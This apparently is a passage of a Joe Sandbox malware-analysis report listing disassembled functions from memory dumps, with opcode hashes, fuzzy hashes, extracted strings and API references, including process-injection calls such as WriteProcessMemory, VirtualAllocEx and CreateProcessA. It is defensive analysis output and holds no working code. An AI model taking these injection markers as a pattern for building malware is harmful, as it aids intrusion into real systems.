Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64af7df7c345f87ddc581a80ee9c4c1c5fd94723b69202dfd3bb69afe912457
Instruction ID: efd655e75b6419ac7f526c8893cf4ea0fee343a85e7c58cb796d0da90c5a90e8
Opcode Fuzzy Hash: e64af7df7c345f87ddc581a80ee9c4c1c5fd94723b69202dfd3bb69afe912457
Instruction Fuzzy Hash: A261F874E04258CFEB24CFA9D844B9EBBF2FB89304F0490ABD449AB354DB7459858F45

Function 05D6B8E0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82bab5029865f802c70aa70a4b186ecfa8c06d217309bd92f2eb2228c86164fc
Instruction ID: 2c3c80e003600c8e1a533797101b8b357f9f4722686561b3f44d73c38b288611
Opcode Fuzzy Hash: 82bab5029865f802c70aa70a4b186ecfa8c06d217309bd92f2eb2228c86164fc
Instruction Fuzzy Hash: 0161F974E04258CFEB24CFA9D844B9EBBF2FB89304F0090ABD449AB354DB7459858F55

Function 05D20040 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889b1c4a5f489e1eb145e8988f7129e7a1e71ad92aa31b4208e5b9aa5890cad6
Instruction ID: 09d37ca360b07c0ed29dd27747dc8a4722bf1b3c21199ad5fdf3e27ae838b32e
Opcode Fuzzy Hash: 889b1c4a5f489e1eb145e8988f7129e7a1e71ad92aa31b4208e5b9aa5890cad6
Instruction Fuzzy Hash: 3351E570E01218CFEB54CFAAD848BEDBBF6EB89304F50C0AAD419AB254DB745985CF51

Function 05D20007 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a6164ac16254124d49894b57203158644705a2183a40057c3661a4b03e60a3
Instruction ID: 833cccf0626fb71d4b7bb8fba729124d0e969cfd1f7a8b7c045545d6666b7fb3
Opcode Fuzzy Hash: f8a6164ac16254124d49894b57203158644705a2183a40057c3661a4b03e60a3
Instruction Fuzzy Hash: B7512870E05358CFEB15CFAAD84879DBBF2EB4A314F04C0AAD419AB255EB784985CF11

Function 0583D000 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f3a559b4a65816e24a87dd5789cbbf61437f96f6695778cef8b75c1aa65b3a
Instruction ID: 91d710162a1983b2546af31c8b648fa5d6f1e06b8dc4fad5d27200cb751addbd
Opcode Fuzzy Hash: 73f3a559b4a65816e24a87dd5789cbbf61437f96f6695778cef8b75c1aa65b3a
Instruction Fuzzy Hash: E951D5B0D052288BDB64DF6AC8457EABBF6BB89304F54C0E99809A7255DB744E85CF40

Function 05D6D508 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a810b54ed099452b850d4ca849dab1d64273a13f23f629626ec727b0eb129ead
Instruction ID: 12dc13945721ee790fe01a6cd5bc8d8f530565e6ed79585815055e0f473f567e
Opcode Fuzzy Hash: a810b54ed099452b850d4ca849dab1d64273a13f23f629626ec727b0eb129ead
Instruction Fuzzy Hash: CE41F9B1A00218DFDB14DF6AD845B9EBBF2FB89304F50C0AAD90AA7354DB345D868F50

Function 05D6D518 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e40b71c03fb8121fd8eaef6c2f56d83f06298dee5232340e295ac504cac742
Instruction ID: b4d763822ef7415f8e4e91afea048e3ee0a49f20bc0f880dc1d6c14c990ab392
Opcode Fuzzy Hash: f4e40b71c03fb8121fd8eaef6c2f56d83f06298dee5232340e295ac504cac742
Instruction Fuzzy Hash: 93410BB1A00118CFDB14DF6AD854BAEBBF2FB89304F10C0A6D909A7354DB345D828F50

Function 0583CFF0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16b93c2760fdc115a38184fdc56aaf51c26dccee075a14541252e15dc7314b7
Instruction ID: 64336f6cc4bc972f0c94185737406fa58807e97b37c242b41e2eb9bc5104c420
Opcode Fuzzy Hash: d16b93c2760fdc115a38184fdc56aaf51c26dccee075a14541252e15dc7314b7
Instruction Fuzzy Hash: 2E41E7B0D052188BDB68CF6AC8457E9BBF2BF89300F54C0A9D809A7255DB744E86CF40

Function 05C0B868 Relevance: 7.9, Strings: 6, Instructions: 403
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05C0B91C
pbq, xrefs: 05C0B9BF
4'^q, xrefs: 05C0B93A
4'^q, xrefs: 05C0B9B2
(bq, xrefs: 05C0BA32
4'^q, xrefs: 05C0B8EC

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: f42f889b20b01156e7134790f5ea63d3ccc9354f1e03704fd7c32aa1f4c1e8fa
Instruction ID: 9246697174b75886a76387107e1fb0daeef59b3859001d74136eb2c00fe88d72
Opcode Fuzzy Hash: f42f889b20b01156e7134790f5ea63d3ccc9354f1e03704fd7c32aa1f4c1e8fa
Instruction Fuzzy Hash: 95D16C32A40115DFCB05CFA5C944E99BBB2FF88314F0544A8E509AB276DB32ED56DF90

Function 05D66092 Relevance: 5.0, Strings: 4, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%, xrefs: 05D66923
6, xrefs: 05D6609C
-, xrefs: 05D668FD
', xrefs: 05D6590E

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: %$'$-$6
API String ID: 0-3466781844
Opcode ID: d3138b2b016d0e74c06261d7707800ef28e09d92b9601ddc750516d3d63b6bf5
Instruction ID: a8cea71afb80dc516958d9fbf6838176dd9dad4b39b316e0488781bed717ffbc
Opcode Fuzzy Hash: d3138b2b016d0e74c06261d7707800ef28e09d92b9601ddc750516d3d63b6bf5
Instruction Fuzzy Hash: 9E11A27494162ECFDB24CF64DA48BA9BBF1BB44315F4051EAD818A7A50D7349EC5DF00

Function 05C0A5A8 Relevance: 4.2, Strings: 3, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05C0AAAC
Hbq, xrefs: 05C0AA7D
Hbq, xrefs: 05C0AAFC

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: be56ac9d4cde2742418aa1e9ce4ff3ead98b70c10bb4c7bfac02054223b57f15
Instruction ID: 05f7446fbd9e85de6196ea37d6dbcba23bfde8efb07ab416ca370e0bead953a6
Opcode Fuzzy Hash: be56ac9d4cde2742418aa1e9ce4ff3ead98b70c10bb4c7bfac02054223b57f15
Instruction Fuzzy Hash: C9022B71A047058FCB24DFA5C884A6EBBF2FF88300F148929D5069B7A4DB35ED46CB90

Function 05C0C260 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05C0C5D9
4'^q, xrefs: 05C0C559
4'^q, xrefs: 05C0C47A

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 58340c3fe723afc1832407cc6fcd1f0f3519385cab54bb49eab181727d0639a5
Instruction ID: 4c9fc546909a0f69b888a90df99331800c7808ab9306506535c1a59b4feef1ae
Opcode Fuzzy Hash: 58340c3fe723afc1832407cc6fcd1f0f3519385cab54bb49eab181727d0639a5
Instruction Fuzzy Hash: 9AF1D934B10118DFCB14DFA4D998A9DBBB2FF89304F119558E806AB3A5DB71EC46CB90

Function 05C08688 Relevance: 3.9, Strings: 3, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 05C08691
(bq, xrefs: 05C08803
(bq, xrefs: 05C087AC

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq$(bq$U
API String ID: 0-2683095326
Opcode ID: b5eee9d9913852de0c17f490c87fd63386b6329f5b881f806b31136f49769dc7
Instruction ID: 35938a1099451440f5fb710f2d36a7cc9b374f475a6cbc27f30ca3d29b6edf05
Opcode Fuzzy Hash: b5eee9d9913852de0c17f490c87fd63386b6329f5b881f806b31136f49769dc7
Instruction Fuzzy Hash: 735198323042098FDB149F29D844AAE3BE6FF94314F248569E8058B3A6CF75DD468BE0

Function 05D668AA Relevance: 3.8, Strings: 3, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%, xrefs: 05D66923
-, xrefs: 05D668FD
', xrefs: 05D6590E

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: %$'$-
API String ID: 0-1768325814
Opcode ID: 3824c9fe590521409aaf429b36c22425cba1018fa88a1f3c86e5f96b2da5cfab
Instruction ID: bea57aedf1b855464c7eeb6368739d0041f5ed71f8d4e56a943b6ed8b25e7d19
Opcode Fuzzy Hash: 3824c9fe590521409aaf429b36c22425cba1018fa88a1f3c86e5f96b2da5cfab
Instruction Fuzzy Hash: D3019274A01619CFCB24DF65DD48BA8BBB1FB48319F0041EAD819AB651D7359E85CF00

Function 05851E18 Relevance: 3.1, Strings: 2, Instructions: 625COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05852659
4'^q, xrefs: 05852669

Memory Dump Source

Source File: 00000000.00000002.1704065985.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5850000_download.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 24aa2f936c159e5b970e43ac826cc36c86ba27b5fcadcc34b3cb64d0dbc15c1a
Instruction ID: ae2f2f1b2b8d55f2a30385e503681f276aab06db7a5213edd164a8960c98c1c8
Opcode Fuzzy Hash: 24aa2f936c159e5b970e43ac826cc36c86ba27b5fcadcc34b3cb64d0dbc15c1a
Instruction Fuzzy Hash: 8652E778E04209CFCB15DFA5D448ABEBBB2BF48325F508459ED12AB254CB355D86CFA0

Function 05C06AF9 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C06E23
$^q, xrefs: 05C06E13

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 91df178b11906df2ee2d0f631533f3080b3edacc196068b1ffe33d386423fd5f
Instruction ID: fb9796009d90ab6ca313535e6f52f80ebdbe6c40f5f657dfbf6dcbbe40754fb6
Opcode Fuzzy Hash: 91df178b11906df2ee2d0f631533f3080b3edacc196068b1ffe33d386423fd5f
Instruction Fuzzy Hash: D5126F30E042298FDB15DFA5C854AADBBF2FF48700F149555E812AB390DB789E86CB90

Function 058529D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05852E66
4'^q, xrefs: 05852E76

Memory Dump Source

Source File: 00000000.00000002.1704065985.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5850000_download.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 54ecb82fc99d6c63977c773c296465b776b807c53856c34e2044ce4e2c2c39db
Instruction ID: 3f982b0bec5a34fbf6b54578ba595cc955b31f817f08a2e553b22b8f6c98240d
Opcode Fuzzy Hash: 54ecb82fc99d6c63977c773c296465b776b807c53856c34e2044ce4e2c2c39db
Instruction Fuzzy Hash: C1F1D474E05208DFCB18DFA8E4996ACBBB2FF89325F204429E806A7355CB355D85CF51

Function 05C09C58 Relevance: 2.8, Strings: 2, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 05C09EB9
(bq, xrefs: 05C09C6C

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: 6c75410f8459142407dea3a461ff1e7dcbf97d276d0d0b8f7288c8f6184c1eef
Instruction ID: 6ab4286eb43db3c60e18dd9f27389bd05d0dc70fdadd2567a457414f10abf659
Opcode Fuzzy Hash: 6c75410f8459142407dea3a461ff1e7dcbf97d276d0d0b8f7288c8f6184c1eef
Instruction Fuzzy Hash: AFD16C356006068FCB14DF29C584A6AB7F2FF88310B55C969E45A9B3A6DB30FD46CB90

Function 05C0ADE3 Relevance: 2.8, Strings: 2, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05C0B08C
Hbq, xrefs: 05C0B0F4

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 7c7c94a64c981a4f499545dc4ce837426ff227d82c164b791c191eb4301d9e6b
Instruction ID: b19c36c091ee4febe3476d65c9b397d88af5359e3bc8d0148a23ed6b51a23d42
Opcode Fuzzy Hash: 7c7c94a64c981a4f499545dc4ce837426ff227d82c164b791c191eb4301d9e6b
Instruction Fuzzy Hash: ECC1B0346002159FCB14DF29C880AAEBBF6FF84314F158568E81A9B3A5DB34ED46CBD1

Function 05C060E0 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05C06275
(bq, xrefs: 05C061E6

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: bab8be7b29e59d16f242238e7dbd9b3954bc296ed456901b1e86b5a13d2a8212
Instruction ID: 0ec0ccea59838dbaf10edffe5f9bd142b84cf764ad54ca1a3923ce4247c2f5a0
Opcode Fuzzy Hash: bab8be7b29e59d16f242238e7dbd9b3954bc296ed456901b1e86b5a13d2a8212
Instruction Fuzzy Hash: B15186357042018FCB28AF79C454A2E7BF6BF95610B6088ADD5068B3A5DF31ED42CBA1

Function 05C02EA8 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

j, xrefs: 05C03029
(bq, xrefs: 05C02F1C

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq$j
API String ID: 0-553732478
Opcode ID: 8d017790a80d7cca8bc71bc05d04bec4e2eb9752a96bdde315e531d94dbfa55a
Instruction ID: f26bed4e7894fcbfdb17ecdcf18a6c3b70d265b71ab218fb6a93d22327f48023
Opcode Fuzzy Hash: 8d017790a80d7cca8bc71bc05d04bec4e2eb9752a96bdde315e531d94dbfa55a
Instruction Fuzzy Hash: D8510635B046568FCB10CF68D48896AFBB1FF85320F158A9AE915DB281D730F951CBD0

Function 05C08928 Relevance: 2.6, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

U, xrefs: 05C08A19
(bq, xrefs: 05C089E1

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq$U
API String ID: 0-2540135491
Opcode ID: cf3049e0da5dd23b7afde24ad222ba57c4a56cd8b0efc133ad7b0c46f7962418
Instruction ID: 005772e34901021c16116f2a85b6f593711113cb20df303447a670153ce2e566
Opcode Fuzzy Hash: cf3049e0da5dd23b7afde24ad222ba57c4a56cd8b0efc133ad7b0c46f7962418
Instruction Fuzzy Hash: 0A41F5323082654FCB14DBA9D840A7E7BE6FFC462171888BAE559CB3D1CA35DD01C7A1

Function 05C0B858 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

pbq, xrefs: 05C0B9BF
4'^q, xrefs: 05C0B8EC

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q$pbq
API String ID: 0-3872760177
Opcode ID: e585ed9edda5ac12e2e3f579f24b70701c8a4ab5955e517939b7153741e9aace
Instruction ID: 9ba00322497b275bdac2cd1ea195e75c4aca17d8341f1cd6eed3ab303fc6abee
Opcode Fuzzy Hash: e585ed9edda5ac12e2e3f579f24b70701c8a4ab5955e517939b7153741e9aace
Instruction Fuzzy Hash: B441A331A402099FCB04DF69C9407AEBBF6FF84304F548929D44597369DB71ED468BA1

Function 05D65B90 Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

', xrefs: 05D6590E
#, xrefs: 05D66CC0

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: #$'
API String ID: 0-2443736422
Opcode ID: b726c38190f2562a305666317221acd1edc86b5219127bbc5e49d4eb65a9d434
Instruction ID: fc12ad0bb0d239e5ebf8db144865d676dcfcb247bf76bfcdf5abc25ad2440682
Opcode Fuzzy Hash: b726c38190f2562a305666317221acd1edc86b5219127bbc5e49d4eb65a9d434
Instruction Fuzzy Hash: A931A174A05229CFCB65DF65C958BEABBB1FB49304F0080EAD909A7255DB349E85CF40

Function 05D663E1 Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

/, xrefs: 05D66043
(, xrefs: 05D663EC

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: ($/
API String ID: 0-2468745909
Opcode ID: f04e8345bd59183ae5b05ad8fd309e7a56426c17b544e47970432882f6d0c0d8
Instruction ID: b6d33a3251d5814ffcbb305ba7eddbd08d2bfacd47f4ce2734b1305652d6bbb7
Opcode Fuzzy Hash: f04e8345bd59183ae5b05ad8fd309e7a56426c17b544e47970432882f6d0c0d8
Instruction Fuzzy Hash: BE119074A4222ACBDB64DF64D954BAEBBB1FB48304F1040AAD909A7394CB345E85CF44

Function 05D6598F Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

=, xrefs: 05D659E2
', xrefs: 05D6590E

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: '$=
API String ID: 0-1807951040
Opcode ID: dd02f4a31e820f91e6b86df99e4c05e1f76066ea260d12b808a233e0ed55de46
Instruction ID: b07a014efa79cfdafc7630fd47d03c0169444ef1986a7af1325f3c76b6ac437c
Opcode Fuzzy Hash: dd02f4a31e820f91e6b86df99e4c05e1f76066ea260d12b808a233e0ed55de46
Instruction Fuzzy Hash: A5F03A3590561BDBCF229F54CC00ADABB71FF59310F108286E95867660DB30AAD5DF80

Function 05C0D140 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C0D4BB

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 2a1292b904e598fc7e24c5fc8c7b1ada2948b02403242e6ad240dbe1b6af6882
Instruction ID: 5891989944a73533bbe5d6328dfbbb5e0a70968ce04bf0bbff0117d676cfed00
Opcode Fuzzy Hash: 2a1292b904e598fc7e24c5fc8c7b1ada2948b02403242e6ad240dbe1b6af6882
Instruction Fuzzy Hash: F3522E75A002288FCB64DF69C985BDDBBF2BF88310F1545D9E509A73A5DA309E80CF61

Function 05C07680 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_^q, xrefs: 05C07910

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: 3bb8d7e71eca9ef8e69c8042ad568eaf2b74f3b2b5ac104143072b8b2bddf8d1
Instruction ID: aeddc49ffe0b881d95ff2e35e70b8bad4030ebad697ef9192b379e6aafbaecff
Opcode Fuzzy Hash: 3bb8d7e71eca9ef8e69c8042ad568eaf2b74f3b2b5ac104143072b8b2bddf8d1
Instruction Fuzzy Hash: D3227B71B002059FCB08DFA9D494A6DBBF2FF88710F149469E906AB3A5CB75ED41CB90

Function 05C3F0FD Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C3F36F

Memory Dump Source

Source File: 00000000.00000002.1705145119.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_download.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: de930ce67c1ed2cfc88698b68c224d7ff930a6a76db85a3d7114d30d254a43b6
Instruction ID: 1ed7786fdaad8e6b389b562ca1b507fe976bcedca9ad4e48005042442d28a04e
Opcode Fuzzy Hash: de930ce67c1ed2cfc88698b68c224d7ff930a6a76db85a3d7114d30d254a43b6
Instruction Fuzzy Hash: 27A102B4D0421CCFDB10CFA9D846BEDBBB1BB09304F14996AE859A7240DB788A85CF45

Function 05C3F108 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C3F36F

Memory Dump Source

Source File: 00000000.00000002.1705145119.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_download.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 405081f52ca94e4bb1d4f39e71e208732d7795104a85d0db69813ffc6f3030b7
Instruction ID: 9a10b8d0790a61caa5f85c8377411b59a0a1da227a929b154a639ccadf8b66a3
Opcode Fuzzy Hash: 405081f52ca94e4bb1d4f39e71e208732d7795104a85d0db69813ffc6f3030b7
Instruction Fuzzy Hash: 04A102B4D0421CCFDB10CFA9C846BEDBBB1BF49300F14996AE859A7240DB789A85CF45

Function 05C0DFD9 Relevance: 1.6, Strings: 1, Instructions: 400COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C0E10F

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 7a26a3faf716d854327b330b0195432321e9b1b685476c7c3a3244f54744d0d3
Instruction ID: d87875eda5ebcec6594b37d66e6dcfcebcb62afb44432cbd6d08b16d6a8dce0b
Opcode Fuzzy Hash: 7a26a3faf716d854327b330b0195432321e9b1b685476c7c3a3244f54744d0d3
Instruction Fuzzy Hash: E7E1CD717442028FD724DFAAC44462EBFEAFF94220F185CA9E592CB3E4DA34D985C761

Function 05D20C08 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D20CE3

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2e221fcf4644f3f5b6be8315603a165ad4ce73d83115e8bfd99ea1ac4ab50aa1
Instruction ID: 03891b0980c62627142015454fdc8b2e877f252aca5e34036d2f726cdbf4192a
Opcode Fuzzy Hash: 2e221fcf4644f3f5b6be8315603a165ad4ce73d83115e8bfd99ea1ac4ab50aa1
Instruction Fuzzy Hash: FC41BAB4D012589FCF00CFA9D984ADEFBF1BB49314F10902AE819B7210D735AA45CF64

Function 05D20C10 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D20CE3

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 977c2acf15d6d36b341ce2a1bc5c59893fb1063ab7fc1ada0b9020445595a764
Instruction ID: 1e795bf907c34f02d218ad3dd48dd8028accaacbee7235fe795d36f159eca163
Opcode Fuzzy Hash: 977c2acf15d6d36b341ce2a1bc5c59893fb1063ab7fc1ada0b9020445595a764
Instruction Fuzzy Hash: 2241AAB5D052589FCF00CFA9D984AEEFBF1BB49314F20942AE819B7210D735AA45CF64

Function 05D21A70 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D21B22

Memory Dump Source

